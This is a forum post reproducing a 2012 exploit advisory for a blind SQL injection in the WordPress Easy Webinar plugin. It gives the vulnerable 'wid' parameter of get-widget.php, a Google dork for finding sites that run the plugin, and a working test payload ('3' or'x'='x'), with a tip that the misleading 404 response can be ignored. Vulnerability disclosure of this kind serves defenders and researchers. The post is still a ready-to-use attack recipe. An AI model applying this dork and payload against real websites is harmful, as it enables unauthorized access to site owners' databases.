Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability 10-28-2012, 05:18 PM
#1
Code:
#ExploitTitle:Wordpress Easy
Webinar Plugin Blind SQL Injection
Vulnerability
#VendorHomepage:
www.easywebinarplugin.com
#Date:10/26/2012
#Author:RobertCooper(robert.cooper
[at]areyousecure.net)
#Testedon:[Linux/Windows7]
#Vulnerable Parameters:wid=
#GoogleDork:allinurl:get-
widget.php?wid=
##############################################################
Exploit:
www.example.com/wp-content/plugins/
webinar_plugin/get-widget.php?wid=
[SQLi]
Note:The HTTP response will read 404,
but this is false:
www.example.com/wp-content/plugins/
webinar_plugin/get-widget.php?wid=3'
or'x'='x
This wil lresult in the page loading
correctly and show that the pluginis
vulnerable to injection (string).
##############################################################
![[Image: deceptionorangeoverlay.png]](http://img7.imageshack.us/img7/812/deceptionorangeoverlay.png)